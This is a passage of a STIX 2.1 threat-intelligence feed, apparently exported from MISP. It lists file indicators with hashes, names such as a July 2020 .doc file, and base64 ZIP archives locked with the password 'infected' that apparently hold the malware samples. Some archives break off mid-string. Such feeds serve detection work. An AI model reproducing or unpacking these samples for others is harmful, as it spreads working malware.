'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' AND file:content_ref.x_misp_filename = 'cannot_but_soft.xsl' AND file:content_ref.hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-20T00:03:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7b2b9772-9059-4651-84e8-bc066e15b917",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:hashes.MD5 = '3994131da9d08aa5ca8b4fc671d4c9db' AND file:hashes.SHA1 = '55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5' AND file:hashes.SHA256 = 'e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3' AND file:hashes.SHA512 = '02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1' AND file:hashes.SSDEEP = '6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp' AND file:name = '123.bin' AND file:size = '212992' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:hashes.MD5 = '3994131da9d08aa5ca8b4fc671d4c9db' AND file:hashes.SHA1 = '55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5' AND file:hashes.SHA256 = 'e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3' AND file:hashes.SHA512 = '02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1' AND file:hashes.SSDEEP = '6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp' AND file:name = '123.bin' AND file:size = '212992' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9bb216ae-af15-4cba-9d65-40be296d9438",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T00:46:32.000Z",
"modified": "2020-08-03T00:46:32.000Z",
"pattern": "[file:hashes.MD5 = '0a4fd937473fd2731569d1a39411477e' AND file:hashes.SHA1 = 'cfb9390326c41ac0e81b0274386bae21c53307b1' AND file:hashes.SHA256 = 'e3589aa5d687e58ee97bda2c501bcba9d5e942fe929644602dd1645b3c7f0e94' AND file:name = 'July2020_2485413825.doc' AND file:size = '623616' AND (file:content_ref.payload_bin = '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